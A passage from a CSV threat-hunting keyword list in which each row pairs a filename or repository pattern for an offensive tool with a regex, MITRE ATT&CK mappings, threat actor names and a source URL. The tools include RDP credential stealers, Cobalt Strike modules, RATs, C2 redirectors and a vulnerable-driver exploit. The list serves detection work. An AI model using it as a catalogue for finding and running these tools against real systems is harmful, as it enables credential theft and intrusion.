Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*/rdp-enum-encryption.nse*",".{0,1000}\/rdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RDPHook.dll*",".{0,1000}\/RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*/RDPMITM.py*",".{0,1000}\/RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/rdp-ntlm-info.nse*",".{0,1000}\/rdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rdp-sniffer.cap*",".{0,1000}\/rdp\-sniffer\.cap.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/rdpv.exe*",".{0,1000}\/rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/rdp-vuln-ms12-020.nse*",".{0,1000}\/rdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/readfile_bof.*",".{0,1000}\/readfile_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","19","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*/Readfile_BoF/*",".{0,1000}\/Readfile_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","19","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*/realvnc-auth-bypass.nse*",".{0,1000}\/realvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Reaper.git*",".{0,1000}\/Reaper\.git.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*/Reaper/Reaper.cpp*",".{0,1000}\/Reaper\/Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*/ReaperX64.zip*",".{0,1000}\/ReaperX64\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*/REC2.git*",".{0,1000}\/REC2\.git.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*/Recon-AD.git*",".{0,1000}\/Recon\-AD\.git.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-AllLocalGroups.dll",".{0,1000}\/Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-Computers.dll",".{0,1000}\/Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" 
"*/Recon-AD-Domain.dll",".{0,1000}\/Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-Groups.dll",".{0,1000}\/Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-LocalGroups.dll*",".{0,1000}\/Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-Users.dll*",".{0,1000}\/Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/recon-archy.git*",".{0,1000}\/recon\-archy\.git.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" 
"*/RecycledInjector*",".{0,1000}\/RecycledInjector.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*/RecycledInjector.git*",".{0,1000}\/RecycledInjector\.git.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*/RedGuard.git*",".{0,1000}\/RedGuard\.git.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" 
"*/RedGuard.go*",".{0,1000}\/RedGuard\.go.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/RedGuard_32",".{0,1000}\/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/RedGuard_64",".{0,1000}\/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/redirector/redirector.py*",".{0,1000}\/redirector\/redirector\.py.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - 
T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/redis-brute.nse*",".{0,1000}\/redis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/redis-info.nse*",".{0,1000}\/redis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/redpeanut.cer*",".{0,1000}\/redpeanut\.cer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanut.git*",".{0,1000}\/RedPeanut\.git.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanut.html*",".{0,1000}\/RedPeanut\.html.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutAgent/*",".{0,1000}\/RedPeanutAgent\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutRP/*",".{0,1000}\/RedPeanutRP\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPersist.exe*",".{0,1000}\/RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*/RedPersist.git*",".{0,1000}\/RedPersist\.git.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*/redpill.ps1*",".{0,1000}\/redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/redpill/bin/*.ps1*",".{0,1000}\/redpill\/bin\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/redsocks.sh*",".{0,1000}\/redsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*/redsocks-fw.sh*",".{0,1000}\/redsocks\-fw\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*/RedTeam_toolkit*",".{0,1000}\/RedTeam_toolkit.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*/red-team-scripts*",".{0,1000}\/red\-team\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/RedWarden.git*",".{0,1000}\/RedWarden\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*/ReferenceSourceLibraries/Sharpire*",".{0,1000}\/ReferenceSourceLibraries\/Sharpire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and 